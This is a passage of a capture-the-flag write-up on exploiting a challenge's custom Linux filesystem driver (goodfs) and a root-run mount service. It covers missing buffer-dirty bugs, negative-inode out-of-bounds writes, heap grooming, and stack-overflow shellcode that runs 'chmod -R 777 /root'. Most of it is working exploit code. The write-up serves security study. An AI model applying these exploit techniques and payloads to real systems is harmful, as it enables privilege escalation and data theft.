#define printf(...) fprintf(SOCK, ##__VA_ARGS__)
/** syscall wrappers **/
void exit_group(int code) {
__syscall(231, code);
int getdents64(int fd, void *dents, int size) {
return __syscall(217, fd, dents, size);
/** goodfs stuff **/
struct mounter_shmem {
int flag;
char password[256];
char command[256];
char arguments[256];
int mount_cmd(char *command, char *arguments) {
int mfd = open("/run/mount_shm", 2, 0);
void *maddr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mfd, 0);
struct mounter_shmem *m = (struct mounter_shmem *)maddr;
strcpy(m->password, "MGhtT34gHj5yFcszRYB4gf45DtymEi");
strcpy(m->command, command);
strcpy(m->arguments, arguments);
m->flag = 1;
struct timespec sleeptime;
sleeptime.tv_sec = 0;
sleeptime.tv_nsec = 1000000;
while(m->flag == 1)
nanosleep(&sleeptime, NULL);
int res = m->flag;
munmap(maddr, 0x1000);
return res;
void do_mount() {
int res = mount_cmd("mount", "goodfs");
if(res != 2) {
printf("mount failed: %d\n", res);
void do_umount() {
int res = mount_cmd("umount", "goodfs");
if(res != 2) {
printf("mount failed: %d\n", res);
/** ls replacement **/
struct linux_dirent64 {
uint64_t ino;
uint64_t off;
short reclen;
char type;
char name[1];
void showstat(const char *path) {
int fd = open(path, O_RDONLY, 0);
if(fd < 0) {
printf("[open err: %d]\n", fd);
struct stat stat;
int res = fstat(fd, &stat);
if(res < 0) {
printf("[stat err: %d]\n", res);
printf("devino=%d:%d mode=0x%x nlink=%d uidgid=%d:%d size=%d\n",
stat.st_dev, stat.st_ino, stat.st_mode, stat.st_nlink,
stat.st_uid, stat.st_gid, stat.st_size);
void lsdir(const char *path) {
char newpath[4096];
char dents[32768];
int dfd = open(path, O_DIRECTORY | O_RDONLY, 0);
while(1) {
int nbytes = getdents64(dfd, dents, 32768);
if(nbytes <= 0)
int ptr = 0;
while(ptr < nbytes) {
struct linux_dirent64 *s = (struct linux_dirent64 *)&dents[ptr];
printf("ino=%d off=%d type=%d name=%s ", s->ino, s->off, s->type, s->name);
sprintf(newpath, "%s/%s", path, s->name);
ptr += s->reclen;
int main() {
For debugging, I created a “replacement” for the FTP server binary which directly runs shellcode with the same seccomp restrictions and FD numbers as the real server, meaning that I could iterate on my shellcode without going through the whole FTP server exploit every time. I inserted this program into the initramfs and started it from a modified init
script (sc_runner.c
#include <seccomp.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/mman.h>
void setup() {
char *hsm_path = getenv("HSM_DEVICE");
if(!hsm_path) {
fprintf(stderr,"no hsm\n");
int serial_port = open(hsm_path, 2);
scmp_filter_ctx ctx = seccomp_init(0);
seccomp_rule_add(ctx,0x7fff0000,9,1,SCMP_A2_64(SCMP_CMP_LE, 5));
int res = seccomp_load(ctx);
if (res != 0) {
fprintf(stderr,"Failed to load the filter in the kernel\n");
char sc[65536];
int main() {
int ssock = socket(2, 1, 0);
int val = 1;
setsockopt(ssock, 1, 15, &val, 4);
struct sockaddr_in saddr = {0};
saddr.sin_port = htons(31500);
bind(ssock, (struct sockaddr *)&saddr, sizeof(struct sockaddr_in));
listen(ssock, 1);
printf("Ready! Listening on port %d...\n", ntohs(saddr.sin_port));
struct sockaddr_in caddr = {0};
int caddrsize = sizeof(struct sockaddr_in);
int csock = accept(ssock, (struct sockaddr *)&caddr, &caddrsize);
printf("Got connection!\n");
int fd = open("listen", 0x42, 0666);
int r = read(csock, sc, sizeof(sc));
write(fd, sc, r);
void *sc_mmap = mmap(NULL, (r + 4095) & ~0xfff, 5, 1, fd, 0);
printf("Will execute %d bytes of shellcode at %p\n", r, sc_mmap);
((void (*)(void))sc_mmap)();
Interaction with this runner is done via a very simple Python script (sc_runner.py
) which loads the stager followed by the real shellcode:
# Run a shellcode via sc_runner on qemu.
from pwn import *
s = remote("localhost", 31337)
sc = open("stager", "rb").read()
sc = open("shellcode", "rb").read()
The GoodFS Filesystem
With a root shell in /init
, we can poke around the filesystem we’re provided:
/mnt/goodfs # ls -laR
total 0
drwx------ 1 root root 0 Jan 1 1970 private
drwxrwxrwx 1 root root 0 Jan 1 1970 public
total 0
-rwxr--r-- 1 root root 0 Jan 1 1970 placeholder
total 0
-rwxr--r-- 1 sstic sstic 0 Jan 1 1970 todo.txt
contains the following (translated):
Put your sensitive data in this folder
contains the following (translated):
I was informed that a mark_buffer_dirty is missing somewhere in my code, but where?
By running some shellcode to mount goodfs and read files on the remote server, we can confirm that the remote todo.txt
matches this one, and that the /mnt/goodfs/private
directory is inaccessible to the FTP server user (sstic
is a Linux kernel function, so it’s clear we’re going to have to look at the kernel driver goodfs.ko
which implements this filesystem.
is a typical Linux kernel module, but it has symbols and even DWARF debugging information! Unfortunately, Ghidra gets confused by some of the more complex kernel data structures in DWARF, which necessitated using IDA instead for reversing the module.
Much of the filesystem driver is concerned with converting between the on-disk representation of filesystem structures (inodes and directory entries), and the Linux Virtual File System (VFS) data structures (struct inode
and struct dentry
). Inodes correspond to physical files or directories, where as dentries correspond to the directory entries contained in any particular directory. (A hard link, for example, is just a single inode that shows up as an dentry in more than one directory). The kernel VFS documentation was very helpful in learning about the various pieces of the filesystem driver.
starts with goodfs_init
, which registers the goodfs filesystem using register_filesystem
. This provides the user-visible name of the filesystem (goodfs
) as well as the function used to mount the filesystem (goodfs_mount
). When the filesystem is mounted, goodfs_mount
calls mount_bdev
to mount the filesystem as a block device, which in turn calls goodfs_fill_super
to initialize the VFS superblock. goodfs_fill_super
allocates memory for the filesystem-specific goodfs_sb_info
structure, configures the block-device filesystem with a block size of 4096 bytes, and loads the superblock (block 0).
The superblock (goodfs_super_block
) contains three major components: the magic number (0x600d600d at offset 0), a bitmap of in-use inodes (imap
), and the first half of the inode table (the rest of the inode table is in block #1). The root inode, inode #0, is used as the root of the filesystem. The function goodfs_iget
is used to retrieve the disk block containing the given inode, and translate the on-disk inode format (goodfs_inode
) into a kernel struct inode
From there, operations on the root directory (or any directory) are handled by the goodfs_dir_operations
and goodfs_dir_inode_operations
tables – for example, listing a directory is handled by goodfs_readdir
, finding a file in a directory by name is goodfs_lookup
, and creating new files under a directory is handled by goodfs_create
. Similarly, operations on files are handled by goodfs_file_operations
and goodfs_file_inode_operations
, such as read
) and write
The on-disk formats look like this (from the DWARF symbols):
struct goodfs_imap {
unsigned __int64 v[8];
struct goodfs_super_block {
__u32 magic;
__u32 version;
goodfs_imap imap;
struct goodfs_dir_entry {
__u32 ino;
char name[32];
struct goodfs_inode {
kuid_t uid;
kgid_t gid;
__u64 atime;
__u64 mtime;
__u16 data_block;
__u16 mode;
__u32 size;
The filesystem supports a maximum of 252 inodes (32 bytes each); the first 124 inodes are in disk block 0 starting at offset 0x80, and the next 128 are in disk block 1. Directories support a maximum of 32 directory entries (36 bytes each). Files occupy exactly one disk block (4096 bytes), numbered according to the inode number (inode N occupies disk block N + 2). Directories also occupy exactly one disk block, but the disk block number is given by the data_block
field of the inode. (data_block
is ignored for files).
Like any block device filesystem driver, goodfs
loads disk blocks using the page cache, which buffers the disk blocks in RAM. When the goodfs
requests a disk block using sb_bread
or a related function, the block will be served from the page cache if available, and otherwise loaded from disk and cached. When the filesystem modifies a disk block by editing the cached copy in memory, the filesystem must mark the disk block as being dirty using mark_buffer_dirty
. Periodically, or during unmount, or when the pages are needed for other allocations, clean disk blocks will be discarded while dirty disk blocks will be written back to the disk.
, however, is missing some calls to mark_buffer_dirty
, as the hint suggests. Indeed, goodfs_create
, which is responsible for making new inodes when files or directories are created, is missing a few:
- It first finds a zero bit in the superblock’s in-use bitmap (
) to find a free inode. It then sets the bit to 1, but fails to callmark_buffer_dirty
on the superblock. - It then creates a new VFS inode structure, and zeros out the corresponding disk block (block number
inode + 2
). However, it fails to callmark_buffer_dirty
on this disk block. - Next, it writes the inode to the inode block (either block 0 or block 1), and writes the inode and name to a new
in the parent directory. - It recursively updates
on ancestor directories until it hits the root, usingmark_inode_dirty
on each one. This causesgoodfs_write_inode
to be called on each inode eventually, which correctly usesmark_buffer_dirty
to mark the containing disk block as dirty. - Finally, it marks the parent directory block with
and the new inode withmark_inode_dirty
The second bug is enough to break the filesystem: we can, for example, create a file with contents simulating a directory, remove the file, and then create a new directory; the new directory will reuse the contents of the file (because the zeroing of the block will not be committed to disk), causing it to contain whatever inodes we choose. This shell script demonstrates that bug:
/bin/mounter_client mount goodfs MGhtT34gHj5yFcszRYB4gf45DtymEi
echo -ne '\x00\x00\x00\x00i0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\x07\x00\x00\x00i7\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0' > /mnt/goodfs/public/aaa
rm /mnt/goodfs/public/aaa
/bin/mounter_client umount goodfs MGhtT34gHj5yFcszRYB4gf45DtymEi
/bin/mounter_client mount goodfs MGhtT34gHj5yFcszRYB4gf45DtymEi
mkdir /mnt/goodfs/public/bbb # reuses the inode of aaa
ls -la /mnt/goodfs/public/bbb # shows nothing - the disk block is zeroed in memory
/bin/mounter_client umount goodfs MGhtT34gHj5yFcszRYB4gf45DtymEi
/bin/mounter_client mount goodfs MGhtT34gHj5yFcszRYB4gf45DtymEi
ls -la /mnt/goodfs/public/bbb # shows i1 through i7 - the contents of aaa are reused
When run from a shell on the system, the directory /mnt/goodfs/public/bbb
will contain seven files, i1
through i7
, which contain the contents of inodes 1 through 7 (notably, inode 3 will contain the contents of the file in /private
However, we cannot use this approach directly in our FTP server exploit, because unlink
(and rmdir
) are blocked by the seccomp filter.
Corrupting GoodFS
To corrupt the filesystem from the FTP server, we need to make use of the first bug too. This bug causes the bitmap update in goodfs_create
to not be committed to disk, which would allow a new inode to reuse the same inode number as a recently-created inode. However, the bitmap lives in disk block 0, and goodfs_create
modifies this disk block with a proper mark_buffer_dirty
in two cases:
- If the inode number is less than 124, the new inode will live in disk block 0, and
will be called on it (which eventually callsmark_buffer_dirty
). - If the modification time of the new inode is newer than an ancestor directory, the
of the ancestor will be updated andmark_buffer_dirty
will be called on it.
We can work around the first problem by first creating a sufficient number of dummy files. For the second problem, we can use the utime
syscall – which is inexplicably permitted by the seccomp configuration – to set the modification time of some ancestor directory into the future before creating the new inode. This causes the recursive mtime
update to stop at this directory, instead of continuing all the way to the root directory.
The code to do all this looks as follows (full program in shellcode2.c
void xmkdir(const char *path, int mode) {
int res = mkdir(path, mode);
if(res < 0) {
printf("mkdir %s failed: %d\n", path, res);
void my_xutime(const char *path, unsigned long long atime, unsigned long long mtime) {
unsigned long long timebuf[2];
timebuf[0] = atime;
timebuf[1] = mtime;
int res = __syscall(132, path, timebuf);
if(res < 0) {
printf("utime %s failed: %d\n", path, res);
struct goodfs_dir_entry {
int ino;
char name[32];
int main() {
/* Allocate enough inodes to spill the new inodes into the second superblock block */
xmkdir("/mnt/goodfs/public/d0", 0777);
xmkdir("/mnt/goodfs/public/d1", 0777);
xmkdir("/mnt/goodfs/public/d2", 0777);
xmkdir("/mnt/goodfs/public/d3", 0777);
xmkdir("/mnt/goodfs/public/d4", 0777);
xmkdir("/mnt/goodfs/public/d5", 0777);
xmkdir("/mnt/goodfs/public/d6", 0777);
xmkdir("/mnt/goodfs/public/d7", 0777);
for(int i=0; i<120; i++) {
char path[256];
sprintf(path, "/mnt/goodfs/public/d%d/f%d", i / 16, i % 16);
int fd = open(path, O_CREAT | O_RDWR, 0666);
if(fd < 0) {
printf("failed to create %s: %d\n", path, fd);
xmkdir("/mnt/goodfs/public/crimes", 0777);
/* prevent create from propagating mtime change to root inodes */
my_xutime("/mnt/goodfs/public/crimes", 0x7fffffff, 0x7fffffff);
/* When creating this inode, the free bitmap update (on the first superblock block)
will not be committed because of a missing mark_buffer_dirty.
The inode itself is created on the second superblock block. */
int fd = open("/mnt/goodfs/public/crimes/aaa", O_CREAT | O_RDWR, 0777);
struct goodfs_dir_entry entries[16];
for(int i=0; i<16; i++) {
entries[i].ino = i;
sprintf(entries[i].name, "i%d", i);
write(fd, entries, sizeof(entries));
/* This directory inode will reuse the "aaa" inode. Due to another missing
mark_buffer_dirty, the zeroing of the data block will not be committed. */
xmkdir("/mnt/goodfs/public/crimes/bbb", 0777);
/* aaa and bbb now reference the same inode, and bbb's directory contents
are what was written to the aaa file initially - we can leak any inode */
/* read some spicy secrets? */
char buf[4096];
int secretfd = open("/mnt/goodfs/public/crimes/bbb/i3", O_RDONLY, 0);
if(secretfd >= 0) {
read(secretfd, buf, 4096);
write(SOCKFD, buf, 4096);
} else {
printf("failed to open i3: %d\n", secretfd);
With this exploit, we can read the file in inode 3; this file is simply placeholder
locally, but it is a secret file remotely. I later found out it was called note.txt
; here it is, translated:
The extraction of our friend on the moon went well, and everyone was convinced that he died.
In the event of a trip there in the future, it will be necessary to mask its presence by means of special effects.
Our reptilian colleagues at the CIA executed the plan to perfection.
I don't know exactly how, but a hacker managed to forge an inode to read this secret file.
So I moved my most sensitive information to /root.
He told me he could also access /root via the compromise of mounter_server, but it's impossible, this service is not vulnerable!
I'm so confident of this that I removed all mitigations from this program when compiling it.
He must have corrupted this process via the exploitation of goodfs, but how?
He didn't want to tell me more details, except that he would have used negative inodes...
PS: Maybe it's a bad idea to talk about all that here...
And there is our flag for stage 5!
Stage 6
Our final goal is to access /root/final_secret.txt
, which will require us to gain root privileges on the system. The hint in note.txt
mentions that compromise of mounter_server
is possible, somehow. We will probably have make use of negative inode numbers to do this.
Side-note: during the competition, a hint was released for stage 6 in the
file. The previous version of the file did not mention negative inodes.
There are two places in the code where negative inode numbers can cause trouble. First, in goodfs_iget
inode *goodfs_iget(super_block *s, unsigned __int64 ino)
struct inode *v2;
struct buffer_head *v4;
goodfs_inode *v6;
v2 = iget_locked(s, ino);
if ( !v2 )
if ( v2->i_state & I_NEW )
v4 = _bread_gfp(s->s_bdev, 32 * ((int)ino + 4) / 4096, s->s_blocksize, 8u);
if ( v4 )
v6 = (goodfs_inode *)&v4->b_data[32 * (int)((unsigned __int64)(32 * ((int)ino + 4) % 4096) >> 5)];
v2->i_mode = v6->mode & 0xC1FF;
v2->i_uid.val = v6->uid.val;
v2->i_gid.val = v6->gid.val;
Similarly, in goodfs_write_inode
int __fastcall goodfs_write_inode(inode *inode, writeback_control *wbc)
unsigned __int64 v2;
struct buffer_head *v3;
buffer_head *v4;
goodfs_inode *v5;
v2 = (unsigned __int64)((int)(32 * (inode->i_ino + 4)) % 4096) >> 5;
v3 = _bread_gfp(inode->i_sb->s_bdev, (int)(32 * (inode->i_ino + 4)) / 4096, inode->i_sb->s_blocksize, 8u);
if ( !v3 )
return -12;
v4 = v3;
v5 = (goodfs_inode *)&v3->b_data[32 * (int)v2];
v5->uid.val = inode->i_uid.val;
v5->gid.val = inode->i_gid.val;
v5->mode = inode->i_mode & 0xC1FF;
v5->size = inode->i_size;
v5->data_block = (__u16)inode[-1].i_private;
v5->atime = inode->i_atime.tv_sec;
v5->mtime = inode->i_mtime.tv_sec;
return 0;
32 * (ino + 4)
is divided and modulo’d by 4096 to yield the block number and byte offset of the inode within that block. However, the modulo and division is being performed on the number casted to a signed int. Division with signed numbers rounds towards zero (truncation). If the inode number (ino
) is between -131 and -5, the result is a block number of zero, but a negative byte offset (inode numbers below -131 yield negative block numbers, which are rejected by __bread_gfp
). Note that other goodfs functions either use the full 64-bit inode number (goodfs_read
), perform zero-extension (goodfs_readdir
) or check that the inode is in the range [0, 252) (goodfs_evict_inode
The negative offset results in an out-of-bounds access with respect to the copy of disk block 0 in the page cache (b_data
). Since these cached pages are simply allocated straight out of physical memory using the kernel page allocator, the memory page immediately preceding the cached disk block 0 page may belong to any process or kernel function. Therefore, using negative inodes, we have a restricted ability to read or write some page of memory belonging to something else in the system: reading is achieved by performing stat
on a negative inode file or directory, while writing is achieved by modifying some fields (such as the timestamp fields) and unmounting the filesystem (thereby committing the writes via goodfs_write_inode
Normally, this would be a good time to find some kernel data structure that can be repeatedly allocated, spray live copies of the data structure in RAM, and hope that one of the copies winds up in the page preceding disk block 0. We would then corrupt that data structure, which would hopefully be enough to achieve kernel compromise.
However, in this particular challenge, mounter_server
runs as root, and the hint in the note.txt
suggests that it is the target we should focus on. mounter_server
has some unusual features and an outright memory leak bug:
- The buffer used by
that holds a copy of themount_shm
contents is allocated usingmalloc
(from GLibc). If you put in an invalid password, the buffer is not freed. mounter_server
uses the syslog facility to write messages about the most recent command.- If the command/argument pair is
mount goodfs
orumount goodfs
, the command will be logged using thesyslog_command
function. Otherwise, the messageBad command
will be logged. syslog_command
copies both arguments into a stack-allocated buffer. If an error occurred, the stringError:
is prepended and a function pointer is set tosyslog_error
; otherwise, nothing is prepended and the function pointer is set tosyslog_info
. The function pointer is then called to log the message.
At first glance, this is not exploitable: only five messages can possibly be logged:
Bad command
mount goodfs
umount goodfs
Error: mount goodfs
Error: umount goodfs
Once it became clear that “negative inodes” were involved, a plan formed: what if the negative inodes could be used to overwrite the command and/or argument strings in the heap buffer – after they are checked by do_command
but before they are logged with syslog_command
? In that case, we could overflow the stack inside mounter_server
, and due to the lack of protections (no PIE, no NX), we should be able to trivially compromise it. Furthermore, we can abuse the memory leak bug (#1) to leak lots of memory to more precisely control which heap page will be allocated.
Exploiting mounter_server
via Negative Inodes
First, we want a way to fill a directory full of arbitrary inodes. This is easy enough to do with the exploit from stage 5, but I also wanted to be able to modify the listing dynamically for greater flexibility. To achieve this, I needed to arrange for a directory and a file to share the same disk block, yet have different inode numbers (so we could write to the file inode and read from the directory inode). Since inodes created by goodfs always use the same disk block (inode + 2), we needed a way to completely forge inode structures.
To achieve this, I filled a directory with inodes in the range of 892-923 using the stage 5 exploit. These out-of-range inodes are loaded from disk block 7 ((892 + 4) / 128
), which happens to be the first free disk block. Thus, the first file that I create will contain the inode data for these out-of-range inodes, enabling me to arbitrarily forge inode data. Then, I can configure one of these fake inodes to be a directory with a data_block
pointing at disk block 8, thus overlapping with the data of the second file I create, enabling me to arbitrarily and repeatedly forge directory entries in this directory by modifying the second file.
Here’s how that looks in code:
struct goodfs_inode {
int uid, gid;
uint64_t atime, mtime;
unsigned short data_block, mode;
int size;
/* Init corrupted filesystem.
Key entries:
/mnt/goodfs/public/inodes: inode 5, editable inode data for fake inodes 892~923
/mnt/goodfs/public/dirents: inode 6, editable directory entries
/mnt/goodfs/public/raw/: contains several inodes: 0~7 and 892~899
void init_fs() {
int fd;
/* Make a file to hold fake superblock inodes */
struct goodfs_inode inodes[3];
// Only directories use data_block
inodes[0].uid = 1337;
inodes[0].gid = 1337;
inodes[0].atime = 1337;
inodes[0].mtime = 1337;
inodes[0].data_block = 0;
inodes[0].mode = 040777;
inodes[0].size = 4096;
inodes[1].uid = 1337;
inodes[1].gid = 1337;
inodes[1].atime = 1337;
inodes[1].mtime = 1337;
inodes[1].data_block = 1;
inodes[1].mode = 040777;
inodes[1].size = 4096;
inodes[2].uid = 1337;
inodes[2].gid = 1337;
inodes[2].atime = 1337;
inodes[2].mtime = 1337;
inodes[2].data_block = 8;
inodes[2].mode = 040777;
inodes[2].size = 4096;
// Writing to this file will modify the inode data for inodes 892~899
fd = open("/mnt/goodfs/public/inodes", O_CREAT | O_RDWR, 0777);
write(fd, inodes, sizeof(inodes));
// Writing to this file will modify the directory entries for data block 8
fd = open("/mnt/goodfs/public/dirents", O_CREAT | O_RDWR, 0777);
/* Allocate enough inodes to spill the new inodes into the second superblock block */
xmkdir("/mnt/goodfs/public/hack", 0777);
xmkdir("/mnt/goodfs/public/hack/d0", 0777);
xmkdir("/mnt/goodfs/public/hack/d1", 0777);
xmkdir("/mnt/goodfs/public/hack/d2", 0777);
xmkdir("/mnt/goodfs/public/hack/d3", 0777);
xmkdir("/mnt/goodfs/public/hack/d4", 0777);
xmkdir("/mnt/goodfs/public/hack/d5", 0777);
xmkdir("/mnt/goodfs/public/hack/d6", 0777);
xmkdir("/mnt/goodfs/public/hack/d7", 0777);
for(int i=0; i<110; i++) {
char path[256];
sprintf(path, "/mnt/goodfs/public/hack/d%d/f%d", i / 16, i % 16);
fd = open(path, O_CREAT | O_RDWR, 0666);
if(fd < 0) {
printf("failed to create %s: %d\n", path, fd);
/* prevent create from propagating atime change to root inodes */
my_xutime("/mnt/goodfs/public/hack", 0x7fffffff, 0x7fffffff);
/* When creating this inode, the free bitmap update (on the first superblock block)
will not be committed because of a missing mark_buffer_dirty.
The inode itself is created on the second superblock block. */
fd = open("/mnt/goodfs/public/hack/fd1", O_CREAT | O_RDWR, 0777);
struct goodfs_dir_entry entries[16];
for(int i=0; i<8; i++) {
entries[i].ino = i;
sprintf(entries[i].name, "i%d", i);
for(int i=0; i<8; i++) {
entries[i+8].ino = i+892;
sprintf(entries[i+8].name, "i%d", i+892);
write(fd, entries, sizeof(entries));
/* This directory inode will reuse the "fd1" inode. Due to another missing
mark_buffer_dirty, the zeroing of the data block will not be committed. */
xmkdir("/mnt/goodfs/public/raw", 0777);
Writing to the file /mnt/goodfs/public/dirents
thus modifies the contents of the directory /mnt/goodfs/public/raw/i894
Next, to explore the contents of the negative inode page, we can use fstat
to retrieve the information on each inode. stat
is blocked, and fstat
requires an open file – we cannot necessarily open these negative inode files since their ownership or mode is loaded from uncontrolled memory. Luckily, we can use O_PATH
to open a “path” fd which allows fstat
to function identically to stat
. This lets us build a rudimentary “hexdump” tool for the negative inode page (shellcode3.c
void showstat(const char *path, int raw) {
/* Open with O_PATH to simulate stat() */
int fd = open(path, 010000000, 0);
if(fd < 0) {
printf("[open err: %d]\n", fd);
struct stat stat;
int res = fstat(fd, &stat);
if(res < 0) {
printf("[stat err: %d]\n", res);
if(!raw) {
char mode[8];
for(int i=0; i<7; i++) {
mode[i] = '0' + ((stat.st_mode >> ((6 - i) * 3)) & 7);
mode[7] = 0;
printf("uidgid=%d:%d amtime=%d:%d mode=%s size=%d devino=%d:%d nlink=%d\n",
stat.st_uid, stat.st_gid,
stat.st_atime, stat.st_mtime,
mode, stat.st_size,
stat.st_dev, stat.st_ino, stat.st_nlink);
} else {
unsigned char inode[32];
memcpy(&inode[0], &stat.st_uid, 4);
memcpy(&inode[4], &stat.st_gid, 4);
memcpy(&inode[8], &stat.st_atime, 8);
memcpy(&inode[16], &stat.st_mtime, 8);
memset(&inode[24], 0xcc, 2);
memcpy(&inode[26], &stat.st_mode, 2);
memcpy(&inode[28], &stat.st_size, 4);
for(int i=0; i<32; i++) {
printf("%x%x", inode[i] >> 4, inode[i] & 0xf);
int main() {
int fd;
fd = open("/mnt/goodfs/public/raw", O_DIRECTORY | O_RDONLY, 0777);
if(fd < 0) {
printf("Init fs\n");
/* The file /dirents and the directory /raw/i894 have the same data block,
allowing us to write directory entries to /dirents and read them back
out in /raw/i894. */
for(int offset = -131; offset < 32; offset += 32) {
fd = open("/mnt/goodfs/public/dirents", O_RDWR, 0777);
if(fd >= 0) {
struct goodfs_dir_entry entries[32];
for(int i=0; i<32; i++) {
entries[i].ino = offset + i;
sprintf(entries[i].name, "hack%d", offset + i);
write(fd, entries, sizeof(entries));
} else {
printf("failed to open /dirents: %d\n", fd);
for(int i=0; i<32; i++) {
char path[256];
sprintf(path, "/mnt/goodfs/public/raw/i894/hack%d", offset + i);
showstat(path, 1);
With this, we can explore different combinations of allocating with mmap
and leaking memory in the mounter_server
. The combination I ended up using was to allocate 8192 dummy pages with mmap
, then perform 98 mounter_server
commands with the wrong password to leak memory. A final mount
command would allocate disk block 0 immediately after the most recent heap page in mounter_server
, allowing us to manipulate the heap via the negative inode page.
All changes made to inodes between the mount
and umount
commands will be committed when the filesystem is unmounted, so the heap memory will be overwritten while processing the umount
command inside mounter_server
. We therefore arrange to fill the umount
command with a mostly completed payload that will smash the stack of syslog_command
, overwrite the function pointer with the very handy gadget jmp rdi
, and contain executable code in place of the message to be logged (it’ll be in the heap, which is executable because the stack is marked executable). The payload will be activated by overwriting the umount
command name and null byte with a modified inode structure.
Here’s the sequence of steps for the final exploit:
- Corrupt the filesystem (as in stage 5): create two files at disk blocks 7 (
) and 8 (dirents
), and then corrupt the filesystem to create a directory with inode entries in the range of 892-923. - Allocate a bunch of memory with
, touching each page to ensure it’s faulted in. - Allocate a bunch of heap memory in
by sending it commands with invalid passwords. - Construct a valid
command buffer formount_shm
, with certain bytes set to create fake inodes in memory (specifically: setting uid=gid=1000 for a few inodes so they can be modified by the shellcode in the FTP server process) - Fill the
file with negative inodes, so that we can access the negative inodes from the corresponding directory (i894
). - Use
to change the modification times of some particular inodes. These inodes are chosen specifically to overlap theumount
strings in the later unmount command. - Construct a valid
command buffer, with shellcode and function pointer address ready to go. - Send the command buffer to
, which sees a validumount
command. Duringumount
, the negative inodes are written back, corrupting theumount
strings in the heap. mounter_server
, which will copy the corrupted strings to a stack buffer, resulting in a stack overflow. The message payload is filled with shellcode, and the function pointer is redirected to ajmp rdi
gadget. The function pointer is executed, jumping to the shellcode and executing arbitrary code as root insidemounter_server
.- The shellcode simply performs
chmod -R 777 /root
to give the FTP server access to the secret files. - Read
to win!
Here’s the final shellcode (shellcode4.c
int mount_leak() {
int mfd = open("/run/mount_shm", 2, 0);
void *maddr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mfd, 0);
struct mounter_shmem *m = (struct mounter_shmem *)maddr;
strcpy(m->password, "NotThePassword");
m->flag = 1;
while(m->flag == 1)
int res = m->flag;
munmap(maddr, 0x1000);
return res;
int hack_command(char *buf, char *command) {
int mfd = open("/run/mount_shm", 2, 0);
void *maddr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mfd, 0);
struct mounter_shmem *m = (struct mounter_shmem *)maddr;
memcpy(m->password, buf, 768);
strcpy(m->password, "MGhtT34gHj5yFcszRYB4gf45DtymEi");
strcpy(m->command, command);
strcpy(m->arguments, "goodfs");
m->flag = 1;
int iterations = 0;
while(m->flag == 1 && iterations++ < 1000)
int res = m->flag;
munmap(maddr, 0x1000);
return res;
int main() {
int fd;
printf("Starting run\n");
fd = open("/mnt/goodfs/public/raw", O_DIRECTORY | O_RDONLY, 0777);
if(fd < 0) {
printf("Init fs\n");
printf("Alloc a lot\n");
/* Steal lots of bits of memory */
for(int i=0; i<256; i++) {
char *ptr = (char *)mmap(0, 32 * 4096, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if(ptr == NULL) {
printf("mmap failed!\n");
for(int j=0; j<32; j++) {
ptr[4096 * j] = i + j + 1;
printf("Leak via umount\n");
for(int i=0; i<98; i++) {
/* set uid/gid = 1000 */
printf("Final mount\n");
char insert_buf[768];
memset(insert_buf, 0xcc, 768);
*(int *)&insert_buf[240] = 1000;
*(int *)&insert_buf[244] = 1000;
*(int *)&insert_buf[496] = 1000;
*(int *)&insert_buf[500] = 1000;
hack_command(insert_buf, "mount");
printf("Hacking block -1\n");
/* The file /dirents and the directory /raw/i894 have the same data block,
allowing us to write directory entries to /dirents and read them back
out in /raw/i894. */
int offset = -85;
fd = open("/mnt/goodfs/public/dirents", O_RDWR, 0777);
if(fd >= 0) {
struct goodfs_dir_entry entries[32];
for(int i=0; i<32; i++) {
entries[i].ino = offset + i;
sprintf(entries[i].name, "hack%d", offset + i);
write(fd, entries, sizeof(entries));
} else {
printf("failed to open /dirents: %d\n", fd);
lsdir("/mnt/goodfs/public/raw/i894", 1);
my_xutime("/mnt/goodfs/public/raw/i894/hack-77", 0x4141414141414141, 0x4242424242420eeb);
my_xutime("/mnt/goodfs/public/raw/i894/hack-69", 0x4141414141414141, 0x4242424242420eeb);
lsdir("/mnt/goodfs/public/raw/i894", 1);
printf("Final umount\n");
memset(insert_buf, 0xcc, 768);
insert_buf[256+160] = 0;
/* 0x004016ed: jmp rdi */
*(unsigned long long *)&insert_buf[551] = 0x004016ed;
hack_command(insert_buf, "umount");
char secret_buf[4096];
lsdir("/root", 0);
fd = open("/root/final_secret.txt", O_RDONLY, 0666);
if(fd < 0) {
printf("failed to open final secret :(\n");
int res;
while(1) {
res = read(fd, secret_buf, 4096);
if(res <= 0) {
write(5, secret_buf, res);
The root shellcode (which is copied to &insert_buf[256+16]
above) is given in root_shellcode.s
, and looks like this:
xor eax, eax
lea rdi, [rel start]
; insert nulls
push rdi
pop rbx
add rbx, arg1-1-start
mov [rbx], al
add rbx, cmd-arg1
mov [rbx], al
add rbx, end-cmd
mov [rbx], al
push rax ; NULL
push rsp
pop rdx ; envp -> [NULL]
add rdi, bin-start
lea rcx, [rdi+cmd-bin]
push rcx ; "$CMD$"
lea rcx, [rdi+arg1-bin]
push rcx ; "-c"
push rdi ; "/bin/sh"
push rsp
pop rsi ; argv -> ["/bin/sh", "-c", "$CMD$", NULL]
mov al, 59 ; __NR_execve
bin: db "/bin/sh", 0xcc
arg1: db "-c", 0xcc
cmd: db "chmod -R 777 /root", 0xcc
When run, this produces the contents of final_secret.txt
, translated:
We have finally received a transmission from our home planet!
This transmission line hides several of them, so that no human can read its contents.
World domination is at hand, hahahahaha!
There’s our flag for stage 6!
Final Stage
As usual, there’s one more step to go before we can declare victory. We need to decode this “transmission”.
The “transmission” (the last line of final_secret.txt
) is 104219 bytes long. This number factorizes as 1171×89. If we split the transmission into lines of 1171 bytes long, we get final_secret_lines.txt
; without word wrapping, the left few columns look like this:
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkOOkd:'. ..,cxOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO000O0O0000000000000 ;0000000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkc. 'oOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO0O0O0O000000000000 ,0000000000000
